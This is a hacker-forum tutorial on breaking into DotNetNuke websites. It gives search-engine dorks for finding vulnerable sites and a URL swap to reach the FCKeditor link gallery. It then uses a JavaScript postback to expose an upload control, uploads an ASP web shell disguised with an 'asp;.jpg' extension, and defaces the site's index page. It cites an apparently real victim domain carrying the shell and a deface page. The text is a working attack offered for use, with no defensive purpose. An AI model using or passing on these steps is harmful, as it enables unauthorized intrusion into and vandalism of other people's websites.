Portal Hacking (DNN) | Dot Net Nuke Website Hacking Tutorial

Hello frnds,Another easy  method of website Hacking called "Portal Hacking (Dot Net Nuke)". 

Lets start 

Step 1 - open Google.com

Step 2:Now enter any of these  dorks

:inurl:/tabid/36/language/en-US/Default.aspx

inurl:fcklinkgallery.aspx 

This dork will be be Find Automaticly Vulnerable sites Step 3: 
you will find many sites, Select Any one 

Step 4: 
For example take this site.
Example:

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9:You will Find the Upload Option

Step 10:
Select RootStep 11:
Upload your shell ASp Download it here
After upload 
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/umer.asp;.jpg
so you upload shell and shell is front of you look like this (screenshot below)
Click on... again and again till you will see admin

so when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.ITSERVICESPRO.NET\WEBSITE\
and upload your deface index page so
this is your result www.site.com/urpagename.htmlfor example see this http://www.itservicespro.net/jaihind.html

If you want to deface main page then click on Admin dir and search for index.htm,index.html or default.html or .html and click on edit then replace with your deface code Example Shell Uploded by Umer Rock